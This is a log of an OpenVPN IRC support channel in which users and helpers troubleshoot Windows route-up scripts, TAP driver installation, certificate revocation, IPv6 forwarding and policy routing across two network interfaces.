mementomori> EugeneKay, but log doesn't put any warning about route-up line 02:50 < mementomori> EugeneKay, I'll try with single \ 02:51 < mementomori> EugeneKay, ok. trying --cd 02:53 -!- bmanatwork [~work@cpe-70-112-107-27.austin.res.rr.com] has left #openvpn ["Leaving"] 02:54 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 248 seconds] 03:02 < mementomori> mmmm --cd, single \ and using / instead of \\ haven's solved the problem 03:04 < mementomori> I tried route-up c:/Programmi/OpenVPN/config/infotel-ts/route-upXXX.bat and it complains the file doesn't exist 03:04 <+pekster> mementomori: So --cd "C:\Some\where" --route-up "C:/Some/where/script.bat" ? 03:04 < mementomori> pekster, yes 03:04 < mementomori> so I think the problem is in the .bat 03:04 -!- AsadH is now known as zz_AsadH 03:05 <+pekster> Quoted or not? I'm curious as I didn't get a sample route-up script to work in either 2.2.2 or 2.3.0-x64 bit. Interesitngly enough, the 'verb 4' is ignored in 2.3.0 as well 03:05 <+pekster> Downgrading to 2.2.2 and the exact same config verb 4 works fine 03:05 <+pekster> :\ 03:05 -!- Orbi [~opera@109.129.12.35] has joined #openvpn 03:06 < mementomori> pekster, it was working with and older release 03:06 < mementomori> pekster, but I dont remember which version it actually was 03:07 <+pekster> k. So now you're using --route-up with or without outside-quotes? 03:07 < mementomori> www.pastebin.com/X4E6AAUZ 03:07 < mementomori> pekster, now without quotes 03:08 <+pekster> Interesting. I should gander at the code since I've seen some quoting issues due to Windows pathnames in the past too 03:08 <+pekster> Windows is such a PITA ;) 03:08 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:08 < mementomori> pekster, but it cannot be a quoting problem becouse it is able to detect missing files. 03:09 <+pekster> They shouldn't have been missing though, right? openvpn is "supposed" to support Windows-style paths as parameters too 03:09 <+pekster> You usually have to escape spaces in names (via quotes or escapes) and also escape backslashes 03:09 -!- Orbi [~opera@109.129.12.35] has quit [Ping timeout: 248 seconds] 03:10 <+pekster> For example, here's a (working) cd directive that's valid in 2.2.2 and 2.3.0: cd "D:\\Apps\\OpenVPN\\config\\auth-client" 03:10 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Ping timeout: 244 seconds] 03:11 < mementomori> pekster, I'll try again 03:11 <+pekster> If you use cd, you should also be able to use a relaative name to your script 03:11 < mementomori> with all the \\ and / and quote combinations 03:12 <+pekster> So if 'foo.bat' is in the same folder you --cd to, it should work to do '--route-up foo.bat' 03:12 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 03:12 < mementomori> pekster, in older releases everything was relative to %ProgramFiles%\OpenVPN\config by default 03:13 < mementomori> and this is good because you can't actually know where %programfiles% is 03:14 <+pekster> My guess is that was only true if the GUI started it. Normally it doesn't do any dir changes, so if you start in c:\somewhere it'll root there unless changed 03:14 < mementomori> and you cant access %programfiles% from .bat launched by openvpn 03:14 <+pekster> Sure you can (unless you mean UAC limitations. That's not ovpn's problem at that point) 03:14 < mementomori> pekster, yes. you could be right sing I'm using the gui 03:14 < mementomori> s/sing/since 03:18 -!- djc [~djc@gentoo/developer/djc] has joined #openvpn 03:20 < djc> so I have topology subnet setup with a simple 255.255.255.0 subnet; now, I'd like some clients to have a stable IP, so I have ccd files for those 03:20 < mementomori> no way. I'll try downgrading 03:20 <+pekster> djc: The IP a client gets does not change the CN it uses, which is what your ccd files are named after 03:20 < djc> however, I was counting on the other clients to not get any of those stable-designated IP's, but yesterday some of those IP's got assigned to our new Android clients 03:21 < djc> pekster: right, I get that 03:21 <+pekster> djc: Oh, okay, so you want some statically addressed (via ccd entries) vs dynamic clients. Then lower your --ifconfig-pool range 03:21 <+pekster> Don't assign a dynamic range to overlap IPs you manage external to the pool or you'll get unexpected surprises like that 03:23 < djc> pekster: so currently I just use a server option, no ifconfig-pool 03:23 <+pekster> Expand that helper-directive yourself 03:23 < djc> yeah 03:23 * pekster hates helper directives for that reason 03:24 <+pekster> You can't just issue --ifconfig-pool (I did test that a couple of weeks back actually) as it's invalid to do that 03:24 <+pekster> not after you use a --server* option 03:25 < djc> ok, but so the routing will still work out to clients that are not in the ifconfig-pool? 03:25 < djc> that's always what I found slightly confusing 03:25 <+pekster> Yea, of course. Any 'push "route ..."' statements, plus any kernel-level routing doesn't change 03:26 <+pekster> Just the IP. --ifconfig-pool manages the --ifconfig-push stuff automatically behind the scenes so you don't need ccd or --client-connect scripts for every client 03:26 < djc> but server doesn't imply any "route" statements, only route-gateway 03:26 <+pekster> In subnet? Then that's fine 03:26 < djc> hmm, okay, let's test this 03:27 <+pekster> If your setup currently works and you just need to reduce your pool, expand the --server directive as the manpage shows, then reduce your --ifconfig-pool to a sane value 03:27 <+pekster> That's it. The ccd stuff works as it does now 03:31 < djc> pekster: awesome, thanks for your help 03:34 < mementomori> ok. downgrading to latest 2.2 solved my problem 03:34 < mementomori> should I fill a bug report? 03:35 <+pekster> You're getting 'file not found' on a path for your --route-up script that works in 2.2.2? 03:35 <+pekster> Or does it not execute the script at all? 03:36 < mementomori> pekster, the script isn't executed 03:36 <+pekster> Sounds like a 2.3.0 bug then 03:37 < mementomori> pekster, but 2.3.0 correctly checks if the file exists 03:37 < mementomori> pekster, it "just" forget to call it :) 03:41 -!- djc [~djc@gentoo/developer/djc] has left #openvpn [] 03:54 -!- master_of_master [~master_of@p57B53EFA.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 03:59 -!- zz_AsadH is now known as AsadH 04:03 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 04:16 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 04:23 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 04:35 < holmen> pekster: i've PM:ed you :) 04:36 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 04:38 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 04:46 -!- p3rror [~mezgani@2001:0:53aa:64c:14e8:5090:d607:374c] has joined #openvpn 04:50 -!- master_of_master [~master_of@p57B5402B.dip.t-dialin.net] has joined #openvpn 05:01 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 05:01 < Rienzilla> 13 05:02 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn 05:02 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has left #openvpn [] 05:03 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn 05:03 -!- dazo_afk is now known as dazo 05:04 < zrzerenato> hi 2 all, im having a simple issue and googling is not helping so much, can some one please ? 05:08 < zrzerenato> iam connecting normally with all ovpn clients, but duty´s note´s, they are not administrator user at local computer(windows 7), but i already set privileges for those users, and i even found these (route-method exe route-delay 2), for setting client .conf file 05:08 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 05:09 < zrzerenato> i can connect but with the following error FlushIpNetTable failed on interface Access Denied 05:10 -!- MariusIT [~userit@86.120.191.55] has quit [Quit: Nettalk6 - www.ntalk.de] 05:11 < zrzerenato> any one? 05:12 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 05:21 <+pekster> zrzerenato: http://www.openvpn.se/files/howto/openvpn-howto_run_openvpn_as_nonadmin 05:21 <@vpnHelper> Title: HowTo Run OpenVPN as a non-admin user in Windows (at www.openvpn.se) 05:21 <+pekster> zrzerenato: Your error is pretty self-explanitory; the running user lacks the ability to perform an operation on the network interface 05:25 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 05:25 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 05:26 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 05:27 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 05:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 252 seconds] 05:29 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 05:38 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 05:38 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 05:42 -!- brute11k1 [~brute11k@89.249.230.101] has joined #openvpn 05:42 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 244 seconds] 05:44 < zrzerenato> pekster thanks ill try that and let you know!! 05:59 < zrzerenato> pekster: HKEY_LOCAL_MACHINE\SOFTWARE\OpenVPN-GUI\allow_service there is no key on my registry editor 06:05 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 06:10 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 06:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:15 -!- valparaiso_ [~valparais@ARennes-257-1-57-80.w81-53.abo.wanadoo.fr] has joined #openvpn 06:17 -!- valparaiso_ is now known as valparaiso 06:18 < BtbN> How do i make my openvpn server forward ipv6? It successfully pushes the ipv6 subnet route, and the client also gets to the first hop, but nothing after it. 06:19 < BtbN> I enabled the ipv6 version of ip_forward 06:19 < BtbN> i it's the responses that don't get through 06:40 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 06:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 06:46 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 06:48 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 06:50 -!- valparaiso [~valparais@ARennes-257-1-57-80.w81-53.abo.wanadoo.fr] has left #openvpn [] 06:58 -!- gedO [~quassel@2002:5877:9af0:1000:adeb:bb17:df63:d8d3] has joined #openvpn 06:58 <@ecrist> what's my fault? 07:00 < gedO> Hello, who can help me with interfaces? 07:00 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 252 seconds] 07:01 <@ecrist> !ask 07:01 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 07:01 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:02 < gedO> Okey, OpenVPN created on ly one tar interface. I need more. How I can create more? 07:02 < gedO> ecrist: Do you know? 07:03 <@ecrist> there's a batch script included, don't remember where it gets installed, but I think c:\program files\openvpn called tuntap.bat or somesuch 07:03 < gedO> ecrist: okey, i will check :) 07:08 < gedO> ecrist: I can't find that script 07:08 <@ecrist> it's there, somewhere 07:09 <@ecrist> let me see if I can figure out where it is 07:09 < kisom> gedO, ecrist: I don't have it either on 2.3.0. It used to be under the bin folder if I recall correctly. 07:10 < gedO> kisom: Do you have this problem to? 07:10 <@ecrist> C:\Program Files\OpenVPN\bin\tapinstall.exe 07:10 <@ecrist> does not exist? 07:10 < kisom> Not on 2.3 .) 07:11 < gedO> ecrist: nope 07:11 <@ecrist> try searching your entire system 07:11 < kisom> One sec, let me try something. 07:11 <@ecrist> I'll look into it from my end 07:11 < kisom> Check in C:\Program Files\TAP-Windows\bin 07:12 < kisom> Seems they've split up openvpn and the TAP driver in 2.3 07:12 <@ecrist> similar to how they stripped easy-rsa out of core 07:12 < gedO> kisom: I have that directory 07:13 < gedO> kisom: What is next to create tap? 07:13 <@ecrist> do you have tapinstall.exe? 07:13 < kisom> Execute "devcon.exe help" 07:13 < kisom> there's lots of info in there 07:14 < gedO> kisom: Okey 07:14 < gedO> kisom: Looking right now :) 07:15 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 07:16 < kisom> Anyways, I need to mirror my drive and send it back to seagate for a replacement. Hence I'll be off for a few hours. Cya. 07:23 < BtbN> Hm, i just can't figure out what's wrong. I even can't ping my network from the openvpn server, as it tries to issue the ping from the openvpn interface 07:23 < BtbN> what shouldn't be a problem, but it is 07:34 <+pekster> ecrist, gedO, you need to manually run the 'tap-windows.exe' installer 07:35 <+pekster> Whoever built the 2.3.0 (inculding rc builds) didn't use the right version of the nsis script, so those don't get installed by default 07:35 <@ecrist> that'd be mattock 07:35 <+pekster> Have an email? 07:35 < gedO> pekster: Yes, i know. I have found solution 07:35 <@ecrist> pekster: if you know what's wrong, can you please post to the -devel mailing list, or in the -devel IRC channel? 07:36 <+pekster> ecrist: Sure thing. I just discovered the exact issue a day or two ago and I simply lost track of it (gotta put a postit or something.) 07:36 <+pekster> I'll get to it once I have some coffee this morning I guess 07:37 < gedO> pekster: http://pastebin.com/96qBm918 here is script to add one TAP 07:37 < khem_> I've had several attempts now to revoke a cert to exclude a user from my OpenVPN server without success. The output from OpenSSL looks all good: http://pastie.org/5834385. Anyone knows what's wrong? 07:37 <+pekster> gedO: Yea. You can swipe the scripts from an older version, but they're "supposed" to be installed 07:38 -!- bisko [~bisko@77.70.26.115] has joined #openvpn 07:38 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 07:38 <+pekster> gedO: For now, if you open the openvpn-install*.exe file with 7-zip, go to .\$TEMP\ and grap tap-windows.exe, reinstall that, and select the optional "utilities" you get it in your TAP-Win32 program files folder 07:38 * pekster goes to get that email sent off before the day gets more complicated 07:39 <@ecrist> khem_: is your CRL included in your openvpn config file? 07:39 <@ecrist> and is the CRL your openvpn instance references up to date? 07:39 < khem_> ecrist: included with crl-verify, yes. 07:39 < gedO> pekster: okey 07:39 <@ecrist> khem_: is it up to date? 07:39 < khem_> I'm not sure what you meant about the last part - instance references? 07:40 <@ecrist> the file referenced by crl-verify needs to be up to date 07:40 <@ecrist> the revokation is only stored in the CRL, not in the cert, so if Openvpn is using an old CRL, it won't know about the newly-revoked certificate 07:41 < khem_> ecrist: oh, the .crl-verify file is updated just minutes ago according to filesystems, and is the same file that I queried with OpenSSL and gives status of 2 revoked certs. 07:41 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Ping timeout: 256 seconds] 07:41 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 07:41 <@ecrist> are you sure you revoked the correct certificate, then? 07:42 <@ecrist> also, if the user is already connected, revoking it won't disconnect the active session 07:42 -!- gedO [~quassel@2002:5877:9af0:1000:adeb:bb17:df63:d8d3] has quit [Remote host closed the connection] 07:43 < khem_> ecrist: it is the correct certificate and I try to verify by establishing new connection to the OpenVPN 07:44 <@ecrist> !logs 07:44 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 07:44 <@ecrist> !verify 07:44 <@ecrist> !factoids search verify 07:44 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5 07:44 <@ecrist> !certverify 07:44 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5 07:46 <+pekster> khem_: It might be worth a HUP to your server too, just in case that crl-verify directive was added or changed since the service was last restarted 07:46 <+pekster> that'll kill all active connections, so careful not to do that if it's a production system with "important" users on 07:46 <@ecrist> let's start with logs 07:47 < khem_> hmm, server1.crt on server and ca.crt have different md5sums to begin with 07:48 <@ecrist> they're different certs 07:48 <@ecrist> you won't be using a CA cert for the server cert 07:48 < khem_> oh 07:48 < khem_> bit confused 07:48 < khem_> :p 07:48 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 07:49 <@dazo> khem_: I haven't had time to fix up this draft .... but maybe this can help a bit more to understand PKI and certificates ... https://community.openvpn.net/openvpn/wiki/How_does_PKI_work 07:49 <@vpnHelper> Title: How_does_PKI_work – OpenVPN Community (at community.openvpn.net) 07:50 < khem_> thankyou dazo, very helpful 07:55 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 07:55 < khem_> the certificates match: keys/xxxx.crt: OK 07:56 < khem_> have to turn on some logging then 08:12 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 240 seconds] 08:14 < khem_> I read something that there might be issues revoking certs when using static key? 08:17 -!- p3rror [~mezgani@2001:0:53aa:64c:14e8:5090:d607:374c] has quit [Ping timeout: 245 seconds] 08:18 < BtbN> hm, seems like my router does not forward the answers back to me :/ 08:19 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn 08:19 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Remote host closed the connection] 08:20 <@dazo> khem_: yeah, it's a big issue with revoking certs when using static key .... the big issue is that you can't use certs with a static key 08:28 < khem_> oh, so even though there have been certs defined in my configuration file it might go for the delegated static key first. 08:28 < khem_> I have no clue, I'm troubleshooting an existing system. 08:28 <+pekster> static-key vs X509 modes are mutually-exclusive 08:28 < holmen> I'm running a server with two physical nic's and i've got two separate ip's from my isp. Now i want to tunnel the connection to/from eth0 via openvpn to a external service running TUN as setup. I've been helped by pekster before but he does not seem to be avaliable at the moment ( or he's tired of my endeavours :) ). My problem is that the openvpn tunnel opens on eth1 wich is the default route in the main table. I have added routes and rules 08:32 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 08:32 < khem_> im talking about tls-auth cert/ta.key 08:32 <+pekster> holmen: PMs have fallen off my console this morning. Best to keep questions on the main channel anyway since I'm not always here. Split-routing asside, you need to use the --local directive to bind oepnvpn to the IP on the network you wish to connect through 08:33 < holmen> pekster: i've done that it still does'nt work 08:34 < holmen> it seems that it tunnels through the gateway of the main table not via the openvpn table that i've created 08:34 <+pekster> holmen: http://lartc.org/howto/lartc.rpdb.multiple-links.html 08:34 <@vpnHelper> Title: Routing for multiple uplinks/providers (at lartc.org) 08:34 <+pekster> You need to fix your policy routing first 08:35 -!- niervol [~krystian@193.106.244.150] has quit [Ping timeout: 248 seconds] 08:36 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 08:37 -!- p3rror [~mezgani@2001:0:53aa:64c:10bc:5090:d607:3e63] has joined #openvpn 08:37 < holmen> thank you! 08:41 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 08:42 -!- p3rror [~mezgani@2001:0:53aa:64c:10bc:5090:d607:3e63] has quit [Ping timeout: 245 seconds] 08:49 <@dazo> Hmmm ..... http://i.imgur.com/h2JClux.jpg 08:49 < rob0> haha 08:50 < AsadH> lol dazo 08:50 <+pekster> I dunno, after reiserfs blew up on me my last kernel upgrade, I think the declining use of reiserfs (v3 or v4) results in less murders... 08:59 -!- p3rror [~mezgani@2001:0:53aa:64c:1422:5090:d605:12ca] has joined #openvpn 08:59 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 248 seconds] 09:04 -!- p3rror [~mezgani@2001:0:53aa:64c:1422:5090:d605:12ca] has quit [Ping timeout: 245 seconds] 09:06 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 09:09 < bisko> Hello! Anyone here tried running the iOS openvpn client with pkcs12 certificates? The help (docs) on that states that it should work, but alas, it doesn't recognize the pkcs12 certificate and says invalid format. Did anyone manage to get it working ? 09:13 < dioz> i think my lvm2 is broken 09:20 -!- gedO [~quassel@2002:5877:9af0:1000:adeb:bb17:df63:d8d3] has joined #openvpn 09:29 -!- gedO [~quassel@2002:5877:9af0:1000:adeb:bb17:df63:d8d3] has quit [Ping timeout: 252 seconds] 09:40 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 09:41 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Read error: Connection reset by peer] 09:43 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 248 seconds] 09:46 -!- mbrit [~mbrit@186.120.97.194] has joined #openvpn 09:48 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:51 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 09:56 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds] 10:17 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 10:25 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Connection reset by peer] 10:27 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 245 seconds] 10:33 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has joined #openvpn 10:36 -!- mementomori [~mementomo@unaffiliated/mementomori] has quit [Quit: Sto andando via] 10:40 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:40 -!- Steven_ [~deepstar@pegasus.singularity.be] has joined #openvpn 10:41 < Steven_> hello everyone 10:42 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 10:42 < Steven_> is there a way to install openvpn on windows without user interaction (or as little as possible)? 10:42 < Steven_> I can't find any documentation on installer commandline flags 10:43 <+pekster> Steven_: It's NSIS, so /S should do a silent install, although you end up with the issue of unsigned drivers asking for permission to install depending on your Local Security policy settings (default is ask about non-WHQL drivers) 10:43 < Steven_> pekster: aha! 10:43 < Steven_> thank you, I'll give it a try 10:46 <@ecrist> iirc, the drivers are all signed now 10:46 < Steven_> windows xp complains though 10:47 -!- raidz_away is now known as raidz 10:48 <+pekster> Yea, my test VM is XP, and it'll ask every time even if I'm reinstalling the same version 10:50 < Steven_> it seems you can disable this behavior when doing unattended installs 10:50 < Steven_> http://unattended.msfn.org/unattended.xp/view/web/34/ 10:50 <@vpnHelper> Title: MSFN's Unattended Windows : Drivers via WINNT.SIF (at unattended.msfn.org) 10:50 < Steven_> looks perfect for my case 10:51 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:57 -!- bisko [~bisko@77.70.26.115] has quit [Ping timeout: 240 seconds] 11:09 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:09 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:09 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:22 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 240 seconds] 11:32 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 245 seconds] 11:37 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 11:57 -!- valparaiso [~valparais@ARennes-257-1-57-80.w81-53.abo.wanadoo.fr] has joined #openvpn 11:58 -!- AsadH is now known as zz_AsadH 12:12 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has joined #openvpn 12:21 < BtbN> IPv6 forwarding is horrible. It behaves very strange, if you enable it, you automaticaly disable ra, so you loose your IP address... 12:24 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer] 12:24 -!- tMobile4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 12:33 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 12:34 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 12:50 -!- Orbi [~opera@anon-184-12.vpn.ipredator.se] has joined #openvpn 12:55 < Orbi> @pekster even with SIGUSR1, OpenVPn is not restarting after pppoe connection reset. Here's the log: http://www.pastebay.com/1177174 13:00 <+pekster> Orbi: Interesting. And if you shut it down completely and re-launch it, it works right away? 13:03 < Orbi> no not right away, it seems to need a "cooling off" period 13:03 < Orbi> like 30 seconds 13:07 <+pekster> That's really strange. I'm not sure if --nobind would help since I think it's alreaady releasing the socket completely before a reconnect 13:10 < Orbi> I already have nobind in my config 13:13 < Orbi> maybe with --ping-restart? 13:13 -!- zz_AsadH is now known as AsadH 13:15 <+pekster> No clue really 13:15 < Orbi> It's strange, OpenVPN connects with the remote host, and not even a second after it displays an inactivity timeout and closes the socket 13:15 <+pekster> It's a minute later 13:15 < Orbi> right 13:16 <+pekster> Presumably matching your --pint-restart value 13:16 < Orbi> default is 120 seconds 13:16 < Orbi> so it's gotta be something else 13:17 <+pekster> There has to be something else going on with your pppoe device, because OpenVPN will come back after you do all sorts of dreadful things to the interface. I've unplugged cables before, removed USB network adapters it was using, and even had my phone die on my when my router was using NDIS for an uplink, and OpenVPN happily reconnects as soon as it has a routable interface to get to the peer 13:18 < Orbi> Well, it's my crappy isp modem 13:19 < Orbi> Is there any usefull info from the log when i killall OpenVNP? http://www.pastebay.com/1177175 13:22 <+pekster> Looks like you're downgrading priveleges; are you using the relevant --persist-* options? 13:23 <+pekster> Actually, a client-side config might be helpful to look at too 13:23 < Orbi> you're correct about downgrading privileges, but I'm using persist-key & tun 13:24 <+pekster> Let's see if there's anything that might have been overlooked given that your uplink gets destroyed frequently 13:25 <+pekster> Yea, so the persist options should be fine, provided the client doesn't somehow get a new IP or anything that would require ifconfig to run again. You're not even getting to the TLS handshake though... 13:25 < Orbi> Here's my config: http://www.pastebay.com/1177176 13:25 < holmen> pekster: i've fixed my routing now. But I am connectable from the internet to both nic's. Should'nt the tunneled nic be "unpingable"? 13:26 <+pekster> holmen: Nope, not unless you firewall it 13:26 <+pekster> The fact that you can ping and be pinged from that interface suggests your policy routing is now correct 13:28 < holmen> Hmm ok but the other end of this configuration is a anonymizer service. I does not make sense in my opinoin :/ 13:28 < BtbN> so i had to completely switch of every single bit of auto configuration on that machine 13:28 < BtbN> but now it works fine 13:29 < Orbi> @pekster Well after every pppoe connection reset, I get a new IP. But float is set server-side, so it should play nice. 13:29 <+pekster> Orbi: I'm wondering if there's some issue accessing the ca.crt, since I don't think that's controlled by any persist option. Is that absolute path available from your chroot? 13:30 <+pekster> ie: /tmp/openvpnc1/jail/tmp/openvpnc1/ca.crt ? 13:30 <+pekster> I don't know if it's trying to access that, or something else it expects 13:30 <+pekster> That's really my ownly thought at this point 13:30 <+pekster> That or the auth-user-pass. I dunno 13:31 <+pekster> Oh, do you know when openvpn normally re-keys? 13:31 <+pekster> If you get messages like 'killed expiring key' then those would be working anyway 13:31 < Orbi> every hour 13:32 <+pekster> Yea, k, so much for that theory 13:32 < Orbi> Yeah well thanks for thinking along :) 13:32 <+pekster> I'm now out of ideas. You could try not using chroot and user/group options just to see if anything changes, but that's a shot in the dark at this point. If it were I'd also expect error messages to that end with 'verb 4' like you have 13:33 < holmen> pekster: can i see the tunnel in action in some way? 13:33 <+pekster> You connect: it becomes in action 13:34 <+pekster> If you're online, packets can arrive to you. If you want to stop them, firewall them. Networking 101. 13:34 < Orbi> @pekster this issue was already present before using chroot and downgrading privileges 13:35 < holmen> yeah but the whole idea with the tunnel to the external service is to make my ip anonymous. When just starting the tunnel on with standard 13:35 < Orbi> Thanks for the help 13:35 < holmen> ... with standard routing my main ip is hidden. Why is'nt it so when routing over the other nic? 13:36 <+pekster> Then bind to the VPN IP and you're done. You can't "not have" an IP/routing configured on an interface you're running a VPN over 13:36 <+pekster> It's like asking for an armored car to secure you without needing the car to drive anyway 13:37 < holmen> ok thank you! You have been really helpful :) 13:37 <+pekster> You need to be able to route to your peer. You can then set up a VPN and send traffic across the VPN by using that IP as the bind address (aka: source address) to your apps 13:37 <+pekster> If you don't want certain types of traffic (eg: non VPN traffic) going over the raw link, then you must write firewall rules to prevent it 13:39 < holmen> Ok, that'll be step two. Thank you! 13:41 -!- gedO [~quassel@213.226.181.200] has joined #openvpn 13:41 < gedO> Hey guys, ho I can add tap0901 devices to XP windows and make them hidden? 13:41 < gedO> I need solution thta works on XP and on Win8 13:42 < Steven_> gedO: what do you mean by hidden? 13:42 < gedO> When tap0901 device is added it appiers in bar next to clock 13:42 < Steven_> I've successfully automated the unattended installation of openvpn on windows xp 13:42 < Steven_> its pretty nice 13:42 < Steven_> oh 13:42 < gedO> and it is anoying 13:42 < Steven_> I guess that's just a registry setting 13:43 < gedO> Steven_: do you know that setting? 13:43 < Steven_> no 13:43 < Steven_> on windows xp, I don't have an extra icon next to the clock 13:44 < gedO> Steven_: realy? 13:44 < Steven_> but I also didn't install tap0901, I used the default tap driver that came with the openvpn installer 13:44 < gedO> Steven_: Please,tell more about that default driver 13:44 -!- brute11k1 [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 13:45 < gedO> Steven_: Where I can find it? 13:45 <+pekster> gedO: Pretty sure I told you that hours ago. It's in the installer package that you can break open with 7-zip at the relative path .\$TEMP\tap-windows.exe 13:45 < Steven_> in the installer, when it shows the list of components to install, there is a "TAP Virtual Ethernet Adapter" 13:46 <+pekster> You should never use an older tap driver with a more modern version of the product since the 2 parts are closely related to each other 13:46 < Steven_> it's check by default too 13:46 < gedO> pekster: I have looked ar TAP-Windows drivers whitch is installed with openvpn 13:46 < gedO> Okey guys, i gona extract that installer :) 13:47 -!- _quadDam1ge is now known as _quadDamage 13:47 < Steven_> why are you extracting it? (just curious) 13:47 < gedO> Steven_: I have in mind dowloading source :) 13:47 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:47 -!- mode/#openvpn [+o krzee] by ChanServ 13:49 <+pekster> There's some registry value you can bitmask out to "hide" the adapter I think, although it shouldn't show up in the clock area by default with any modern version of the driver 13:49 <@krzee> !wintaphide 13:49 <@vpnHelper> "wintaphide" is (#1) in regedit find 